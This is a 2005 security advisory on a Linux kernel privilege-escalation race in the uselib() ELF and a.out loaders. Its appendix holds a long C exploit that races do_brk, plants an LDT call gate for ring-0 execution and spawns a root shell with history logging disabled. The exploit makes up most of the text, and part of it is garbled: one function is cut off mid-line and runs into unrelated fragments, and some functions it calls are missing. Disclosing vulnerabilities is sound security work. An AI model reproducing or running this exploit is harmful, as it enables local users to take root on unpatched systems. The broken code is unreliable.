Synopsis: Linux kernel uselib() privilege elevation
Product: Linux kernel
Version: 2.2 all versions, 2.4 up to and including 2.4.29-pre3, 2.6 up
to and including 2.6.10
Vendor: http://www.kernel.org/
URL: http://isec.pl/vulnerabilities/isec-0021-uselib.txt
CVE: CAN-2004-1235
Author: Paul Starzetz
Date: Jan 07, 2005
Updated: Jan 09, 2005
Issue:
======
Locally exploitable flaws have been found in the Linux binary format
loaders' uselib() functions that allow local users to gain root
privileges.
Details:
========
The Linux kernel provides a binary format loader layer to load (execute)
programs of different binary formats like ELF or a.out and more. The
kernel also provides a function named sys_uselib() to load a
corresponding library. This function is dispatched to the current
process's binary format handler and is basically a simplified mmap()
coupled with some header parsing code.
An analyze of the uselib function load_elf_library() from binfmt_elf.c
revealed a flaw in the handling of the library's brk segment (VMA). That
segment is created with the current->mm->mmap_sem semaphore NOT held
while modifying the memory layout of the calling process. This can be
used to disturb the memory management and gain elevated privileges. Also
the binfmt_aout binary format loader code is affected in the same way.
Discussion:
===========
The vulnerable code resides for example in fs/binfmt_elf.c in your
kernel source code tree:
static int load_elf_library(struct file *file)
{
[904] down_write(¤t->mm->mmap_sem);
error = do_mmap(file,
ELF_PAGESTART(elf_phdata->p_vaddr),
(elf_phdata->p_filesz +
ELF_PAGEOFFSET(elf_phdata->p_vaddr)),
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_FIXED | MAP_PRIVATE | MAP_DENYWRITE,
(elf_phdata->p_offset -
ELF_PAGEOFFSET(elf_phdata->p_vaddr)));
up_write(¤t->mm->mmap_sem);
if (error != ELF_PAGESTART(elf_phdata->p_vaddr))
goto out_free_ph;
elf_bss = elf_phdata->p_vaddr + elf_phdata->p_filesz;
padzero(elf_bss);
len = ELF_PAGESTART(elf_phdata->p_filesz + elf_phdata->p_vaddr + ELF_MIN_ALIGN - 1);
bss = elf_phdata->p_memsz + elf_phdata->p_vaddr;
if (bss > len)
do_brk(len, bss - len);
The line numbers are all valid for the 2.4.28 kernel version. As can be
seen the mmap_sem is released prior to calling do_brk() in order to
create the data section of the ELF library. On the other hand, looking
into the code of sys_brk() from mm/mmap.c reveals that do_brk() must be
called with the mmap semaphore held.
A short look into the code of do_brk() shows that:
[1094] vma = kmem_cache_alloc(vm_area_cachep, SLAB_KERNEL);
if (!vma)
return -ENOMEM;
vma->vm_mm = mm;
vma->vm_start = addr;
vma->vm_end = addr + len;
vma->vm_flags = flags;
vma->vm_page_prot = protection_map[flags & 0x0f];
vma->vm_ops = NULL;
vma->vm_pgoff = 0;
vma->vm_file = NULL;
vma->vm_private_data = NULL;
vma_link(mm, vma, prev, rb_link, rb_parent);
where rb_link and rb_parent were both found by calling
find_vma_prepare(). Obviously, if the kmem_cache_alloc() call sleeps,
the newly created VMA descriptor may be inserted at wrong position
because the process's VMA list and the VMA RB-tree may have been changed
by another thread. This is absolutely enough to gain root privileges.
We have found at least three different ways to exploit this
vulnerability. The race condition can be easily won by consuming a big
amount of memory. The code attached uses a similar technique like the
do_brk exploit and uses a LDT call gate to gain CPL0 privileges. However
another exploitation vectors exist: through page reference counters and
'ghost PTEs'.
Impact:
=======
Unprivileged local users can gain elevated (root) privileges. Since the
vulnerability permits privilege 0 ring code execution, users may also
break out from virtual machines like UML (user mode Linux).
Credits:
========
Paul Starzetz has identified the vulnerability and
performed further research. COPYING, DISTRIBUTION, AND MODIFICATION OF
INFORMATION PRESENTED HERE IS ALLOWED ONLY WITH EXPRESS PERMISSION OF
ONE OF THE AUTHORS.
Disclaimer:
===========
This document and all the information it contains are provided "as is",
for educational purposes only, without warranty of any kind, whether
express or implied.
The authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of the information provided in
this document. Liability claims regarding damage caused by the use of
any information provided, including any kind of information which is
incomplete or incorrect, will therefore be rejected.
Appendix:
=========
/*
* binfmt_elf uselib VMA insert race vulnerability
* v1.09
* tested only on 2.4.x and gcc 2.96
*
* gcc -O2 -fomit-frame-pointer elflbl.c -o elflbl
*
* Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define str(s) #s
#define xstr(s) str(s)
#ifndef MREMAP_MAYMOVE
#define MREMAP_MAYMOVE 0x01
#endif
// temp lib location
#define LIBNAME "/dev/shm/_elf_lib"
// shell name
#define SHELL "/bin/bash"
// time delta to detect race
#define RACEDELTA 5000
// if you have more deadbabes in memory, change this
#define MAGIC 0xdeadbabe
// do not touch
#define SLAB_THRSH 128
#define SLAB_PER_CHLD (INT_MAX - 1)
#define LIB_SIZE ( PAGE_SIZE * 4 )
#define STACK_SIZE ( PAGE_SIZE * 4 )
#define LDT_PAGES ( (LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1)/PAGE_SIZE )
#define ENTRY_GATE ( LDT_ENTRIES-1 )
#define SEL_GATE ( (ENTRY_GATE<<3)|0x07 )
#define ENTRY_LCS ( ENTRY_GATE-2 )
#define SEL_LCS ( (ENTRY_LCS<<3)|0x04 )
#define ENTRY_LDS ( ENTRY_GATE-1 )
#define SEL_LDS ( (ENTRY_LDS<<3)|0x04 )
#define kB * 1024
#define MB * 1024 kB
#define GB * 1024 MB
#define TMPLEN 256
#define PGD_SIZE ( PAGE_SIZE*1024 )
extern char **environ;
static char cstack[STACK_SIZE];
static char name[TMPLEN];
static char line[TMPLEN];
static volatile int
val = 0,
go = 0,
finish = 0,
scnt = 0,
ccnt=0,
delta = 0,
delta_max = RACEDELTA,
map_flags = PROT_WRITE|PROT_READ;
static int
fstop=0,
silent=0,
pidx,
pnum=0,
smp_max=0,
smp,
wtime=2,
cpid,
uid,
task_size,
old_esp,
lib_addr,
map_count=0,
map_base=0,
map_addr,
addr_min,
addr_max,
vma_start,
vma_end,
max_page,
ram_limit=0;
static struct timeval tm1, tm2;
static char *myenv[] = {"TERM=vt100",
"HISTFILE=/dev/null",
NULL};
static char hellc0de[] = "\x49\x6e\x74\x65\x6c\x65\x63\x74\x75\x61\x6c\x20\x70\x72\x6f\x70"
"\x65\x72\x74\x79\x20\x6f\x66\x20\x49\x68\x61\x51\x75\x65\x52\x00";
static char *pagemap, *libname=LIBNAME, *shellname=SHELL;
#define __NR_sys_gettimeofday __NR_gettimeofday
#define __NR_sys_sched_yield __NR_sched_yield
#define __NR_sys_madvise __NR_madvise
#define __NR_sys_uselib __NR_uselib
#define __NR_sys_mmap2 __NR_mmap2
#define __NR_sys_munmap __NR_munmap
#define __NR_sys_mprotect __NR_mprotect
#define __NR_sys_mremap __NR_mremap
inline _syscall6(int, sys_mmap2, int, a, int, b, int, c, int, d, int, e, int, f);
inline _syscall5(int, sys_mremap, int, a, int, b, int, c, int, d, int, e);
inline _syscall3(int, sys_madvise, void*, a, int, b, int, c);
inline _syscall3(int, sys_mprotect, int, a, int, b, int, c);
inline _syscall3( int, modify_ldt, int, func, void *, ptr, int, bytecount );
inline _syscall2(int, sys_gettimeofday, void*, a, void*, b);
inline _syscall2(int, sys_munmap, int, a, int, b);
inline _syscall1(int, sys_uselib, char*, l);
inline _syscall0(void, sys_sched_yield);
inline int tmdiff(struct timeval *t1, struct timeval *t2)
{
int r;
r=t2->tv_sec - t1->tv_sec;
r*=1000000;
r+=t2->tv_usec - t1->tv_usec;
return r;
}
void fatal(const char *message, int critical)
{
int sig = critical? SIGSTOP : (fstop? SIGSTOP : SIGKILL);
if(!errno) {
fprintf(stdout, "\n[-] FAILED: %s ", message);
} else {
fprintf(stdout, "\n[-] FAILED: %s (%s) ", message,
(char*) (strerror(errno)) );
}
if(critical)
printf("\nCRITICAL, entering endless loop");
printf("\n");
fflush(stdout);
unlink(libname);
kill(cpid, SIGKILL);
for(;;) kill(0, sig);
}
// try to race do_brk sleeping on kmalloc, may need modification for SMP
int raceme(void* v)
{
finish=1;
for(;;) {
errno = 0;
// check if raced:
recheck:
if(!go) sys_sched_yield();
sys_gettimeofday(&tm2, NULL);
delta = tmdiff(&tm1, &tm2);
if(!smp_max && delta < (unsigned)delta_max) goto recheck;
smp = smp_max;
// check if lib VMAs exist as expected under race condition
recheck2:
val = sys_madvise((void*) lib_addr, PAGE_SIZE, MADV_NORMAL);
if(val) continue;
errno = 0;
val = sys_madvise((void*) (lib_addr+PAGE_SIZE),
LIB_SIZE-PAGE_SIZE, MADV_NORMAL);
if( !val || (val<0 && errno!=ENOMEM) ) continue;
// SMP?
smp--;
if(smp>=0) goto recheck2;
// recheck race
if(!go) continue;
finish++;
// we need to free one vm_area_struct for mmap to work
val = sys_mprotect(map_addr, PAGE_SIZE, map_flags);
if(val) fatal("mprotect", 0);
val = sys_mmap2(lib_addr + PAGE_SIZE, PAGE_SIZE*3, PROT_NONE,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
if(-1==val) fatal("mmap2 race", 0);
printf("\n[+] race won maps=%d", map_count); fflush(stdout);
_exit(0);
}
return 0;
}
int callme_1()
{
return val++;
}
inline int valid_ptr(unsigned ptr)
{
return ptr>=task_size && ptr> 16;
l.limit = MAGIC & 0xffff;
l.limit_in_pages = 1;
if( modify_ldt(1, &l, sizeof(l)) != 0 )
fatal("modify_ldt", 1);
pidx = max_page-1;
}
else if(pnum==3) {
npg=0;
for(pidx=0; pidx<=max_page-1; pidx++) {
if(pagemap[pidx]) {
npg++;
}
else if(npg == LDT_PAGES) {
npg=0;
try_to_exploit(addr_min+(pidx-1)*PAGE_SIZE);
} else {
npg=0;
}
}
fatal("find LDT", 1);
}
// save context & scan page table
__asm__("movl %%esp, %0" : :"m"(old_esp) );
map_addr = addr_max;
scan_mm();
}
// return number of available SLAB objects in cache
int get_slab_objs(const char *sn)
{
static int c, d, u = 0, a = 0;
FILE *fp=NULL;
fp = fopen("/proc/slabinfo", "r");
if(!fp)
fatal("get_slab_objs: /proc/slabinfo not readable?", 0);
fgets(name, sizeof(name) - 1, fp);
do {
c = u = a = -1;
if (!fgets(line, sizeof(line) - 1, fp))
break;
c = sscanf(line, "%s %u %u %u %u %u %u", name, &u, &a,
&d, &d, &d, &d);
} while (strcmp(name, sn));
close(fileno(fp));
fclose(fp);
return c == 7 ? a - u : -1;
}
// leave one object in the SLAB
inline void prepare_slab()
{
int *r;
map_addr -= PAGE_SIZE;
map_count++;
map_flags ^= PROT_READ;
r = (void*)sys_mmap2((unsigned)map_addr, PAGE_SIZE, map_flags,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
if(MAP_FAILED == r) {
fatal("try again (-f switch) and again", 0);
}
*r = map_addr;
}
// sig handlers
void segvcnt(int v)
{
scnt++;
scan_mm_finish();
}
// child reap
void reaper(int v)
{
ccnt++;
waitpid(0, &v, WNOHANG|WUNTRACED);
}
// sometimes I get the VMAs in reversed order...
// so just use anyone of the two but take care about the flags
void check_vma_flags();
void vreversed(int v)
{
map_flags = 0;
check_vma_flags();
}
void check_vma_flags()
{
if(map_flags) {
__asm__("movl %%esp, %0" : :"m"(old_esp) );
} else {
__asm__("movl %0, %%esp" : :"m"(old_esp) );
goto out;
}
signal(SIGSEGV, vreversed);
val = * (unsigned*)(lib_addr + PAGE_SIZE);
out:
return;
}
// use elf library and try to sleep on kmalloc
void exploitme()
{
int r, sz, pcnt=0;
static char smiley[]="-\\|/-\\|/";
// helper clone
finish=0; ccnt=0;
sz = sizeof(cstack) / sizeof(cstack[0]);
cpid = clone(&raceme, (void*) &cstack[sz-16],
CLONE_VM|CLONE_SIGHAND|CLONE_FS|SIGCHLD, NULL );
if(-1==cpid) fatal("clone", 0);
// synchronize threads
while(!finish) sys_sched_yield();
finish=0;
if(!silent) {
printf("\n"); fflush(stdout);
}
// try to hit the kmalloc race
for(;;) {
r = get_slab_objs("vm_area_struct");
while(r != 1) {
prepare_slab();
r--;
}
sys_gettimeofday(&tm1, NULL);
go = 1;
r=sys_uselib(libname);
go = 0;
if(r) fatal("uselib", 0);
if(finish) break;
// wipe lib VMAs and try again
r = sys_munmap(lib_addr, LIB_SIZE);
if(r) fatal("munmap lib", 0);
if(ccnt) goto failed;
if( !silent && !(pcnt%64) ) {
printf("\r Wait... %c", smiley[ (pcnt/64)%8 ]);
fflush(stdout);
}
pcnt++;
}
// seems we raced, free mem
r = sys_munmap(map_addr, map_base-map_addr + PAGE_SIZE);
if(r) fatal("munmap 1", 0);
r = sys_munmap(lib_addr, PAGE_SIZE);
if(r) fatal("munmap 2", 0);
// relax kswapd
sys_gettimeofday(&tm1, NULL);
for(;;) {
sys_sched_yield();
sys_gettimeofday(&tm2, NULL);
delta = tmdiff(&tm1, &tm2);
if( wtime*1000000U <= (unsigned)delta ) break;
}
// we need to check the PROT_EXEC flag
map_flags = PROT_EXEC;
check_vma_flags();
if(!map_flags) {
printf("\n VMAs reversed"); fflush(stdout);
}
// write protect brk's VMA to fool vm_enough_memory()
r = sys_mprotect((lib_addr + PAGE_SIZE), LIB_SIZE-PAGE_SIZE,
PROT_READ|map_flags);
if(-1==r) { fatal("mprotect brk", 0); }
// this will finally make the big VMA...
sz = (0-lib_addr) - LIB_SIZE - PAGE_SIZE;
expand:
r = sys_madvise((void*)(lib_addr + PAGE_SIZE),
LIB_SIZE-PAGE_SIZE, MADV_NORMAL);
if(r) fatal("madvise", 0);
r = sys_mremap(lib_addr + LIB_SIZE-PAGE_SIZE,
PAGE_SIZE, sz, MREMAP_MAYMOVE, 0);
if(-1==r) {
if(0==sz) {
fatal("mremap: expand VMA", 0);
} else {
sz -= PAGE_SIZE;
goto expand;
}
}
vma_start = lib_addr + PAGE_SIZE;
vma_end = vma_start + sz + 2*PAGE_SIZE;
printf("\n expanded VMA (0x%.8x-0x%.8x)", vma_start, vma_end);
fflush(stdout);
// try to figure kernel layout
signal(SIGCHLD, reaper);
signal(SIGSEGV, segvcnt);
signal(SIGBUS, segvcnt);
scan_mm_start();
failed:
fatal("try again", 0);
}
// make fake ELF library
void make_lib()
{
struct elfhdr eh;
struct elf_phdr eph;
static char tmpbuf[PAGE_SIZE];
int fd;
// make our elf library
umask(022);
unlink(libname);
fd=open(libname, O_RDWR|O_CREAT|O_TRUNC, 0755);
if(fd<0) fatal("open lib ("LIBNAME" not writable?)", 0);
memset(&eh, 0, sizeof(eh) );
// elf exec header
memcpy(eh.e_ident, ELFMAG, SELFMAG);
eh.e_type = ET_EXEC;
eh.e_machine = EM_386;
eh.e_phentsize = sizeof(struct elf_phdr);
eh.e_phnum = 1;
eh.e_phoff = sizeof(eh);
write(fd, &eh, sizeof(eh) );
// section header:
memset(&eph, 0, sizeof(eph) );
eph.p_type = PT_LOAD;
eph.p_offset = 4096;
eph.p_filesz = 4096;
eph.p_vaddr = lib_addr;
eph.p_memsz = LIB_SIZE;
eph.p_flags = PF_W|PF_R|PF_X;
write(fd, &eph, sizeof(eph) );
// execable code
lseek(fd, 4096, SEEK_SET);
memset(tmpbuf, 0x90, sizeof(tmpbuf) );
write(fd, &tmpbuf, sizeof(tmpbuf) );
close(fd);
}
// move stack down #2
void prepare_finish()
{
int r;
struct stat st;
static struct sysinfo si;
old_esp &= ~(PAGE_SIZE-1);
old_esp -= PAGE_SIZE;
task_size = ((unsigned)old_esp + 1 GB ) / (1 GB) * 1 GB;
r = sys_munmap(old_esp, task_size-old_esp);
if(r) fatal("unmap stack", 0);
// setup rt env
uid = getuid();
lib_addr = task_size - LIB_SIZE - PAGE_SIZE;
if(map_base)
map_addr = map_base;
else
map_base = map_addr = (lib_addr - PGD_SIZE) & ~(PGD_SIZE-1);
printf("\n[+] moved stack %x, task_size=0x%.8x, map_base=0x%.8x",
old_esp, task_size, map_base); fflush(stdout);
// new method :-]
if(!stat("/proc/kcore", &st)){
addr_min = (task_size + st.st_size + PGD_SIZE ) & ~(PGD_SIZE-1);
addr_max = (addr_min + st.st_size) & ~(PAGE_SIZE-1);
} else {
// old method
sysinfo(&si);
if(ram_limit && si.totalram > ram_limit)
si.totalram = ram_limit;
if(si.totalram >= 896*1024*1024 )
printf(" lot of RAM, consider -r switch");
addr_min = task_size + si.totalram;
addr_min = (addr_min + PGD_SIZE - 1) & ~(PGD_SIZE-1);
addr_max = addr_min + si.totalram;
}
if((unsigned)addr_max >= 0xffffe000 || (unsigned)addr_max < (unsigned)addr_min)
addr_max = 0xffffd000;
printf("\n[+] vmalloc area 0x%.8x - 0x%.8x", addr_min, addr_max);
max_page = (addr_max - addr_min) / PAGE_SIZE;
pagemap = malloc( max_page + 32 );
if(!pagemap) fatal("malloc pagemap", 1);
memset(pagemap, 0, max_page + 32);
// go go
make_lib();
exploitme();
}
// move stack down #1
void prepare()
{
unsigned p=0;
environ = myenv;
p = sys_mmap2( 0, STACK_SIZE, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS, 0, 0 );
if(-1==p) fatal("mmap2 stack", 0);
p += STACK_SIZE - 64;
__asm__("movl %%esp, %0 \n"
"movl %1, %%esp \n"
: : "m"(old_esp), "m"(p)
);
prepare_finish();
}
void chldcnt(int v)
{
ccnt++;
}
// alloc slab objects...
inline void do_wipe()
{
int *r, c=0, left=0;
__asm__("movl %%esp, %0" : : "m"(old_esp) );
old_esp = (old_esp - PGD_SIZE+1) & ~(PGD_SIZE-1);
old_esp = map_base? map_base : old_esp;
for(;;) {
if(left<=0)
left = get_slab_objs("vm_area_struct");
if(left <= SLAB_THRSH)
break;
left--;
map_flags ^= PROT_READ;
old_esp -= PAGE_SIZE;
r = (void*)sys_mmap2(old_esp, PAGE_SIZE, map_flags,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0 );
if(MAP_FAILED == r)
break;
if(c>SLAB_PER_CHLD)
break;
if( (c%1024)==0 ) {
if(!c) printf("\n");
printf("\r child %d VMAs %d", val, c);
fflush(stdout);
}
c++;
}
printf("\r child %d VMAs %d", val, c);
fflush(stdout);
kill(getppid(), SIGUSR1);
for(;;) pause();
}
// empty SLAB caches
void wipe_slab()
{
signal(SIGUSR1, chldcnt);
printf("\n[+] SLAB cleanup"); fflush(stdout);
for(;;) {
ccnt=0;
val++;
cpid = fork();
if(!cpid)
do_wipe();
while(!ccnt) sys_sched_yield();
if( get_slab_objs("vm_area_struct") <= SLAB_THRSH )
break;
}
signal(SIGUSR1, SIG_DFL);
}
void usage(char *n)
{
printf("\nUsage: %s\t-f forced stop\n", n);
printf("\t\t-s silent mode\n");
printf("\t\t-r mem limit bytes\n");
printf("\t\t-c command to run\n");
printf("\t\t-n SMP iterations\n");
printf("\t\t-d race delta usecs\n");
printf("\t\t-w kswapd wait seconds\n");
printf("\t\t-l alternate lib name\n");
printf("\t\t-a alternate addr hex\n");
printf("\n");
_exit(1);
}
// give -s for forced stop, -b to clean SLAB
int main(int ac, char **av)
{
int r;
while(ac) {
r = getopt(ac, av, "n:l:a:w:c:d:r:fsh");
if(r<0) break;
switch(r) {
case 'f' :
fstop = 1;
break;
case 's' :
silent = 1;
break;
case 'n' :
smp_max = atoi(optarg);
break;
case 'd':
if(1!=sscanf(optarg, "%u", &delta_max) || delta_max > 100000u )
fatal("bad delta value", 0);
break;
case 'r':
if(1!=sscanf(optarg, "%u", &ram_limit) )
fatal("bad ram limit", 0);
ram_limit &= ~(PAGE_SIZE-1);
break;
case 'w' :
wtime = atoi(optarg);
if(wtime<0) fatal("bad wait value", 0);
break;
case 'l' :
libname = strdup(optarg);
break;
case 'c' :
shellname = strdup(optarg);
break;
case 'a' :
if(1!=sscanf(optarg, "%x", &map_base))
fatal("bad addr value", 0);
map_base &= ~(PGD_SIZE-1);
break;
case 'h' :
default:
usage(av[0]);
break;
}
}
// basic setup
uid = getuid();
setpgrp();
wipe_slab();
prepare();
return 0;
}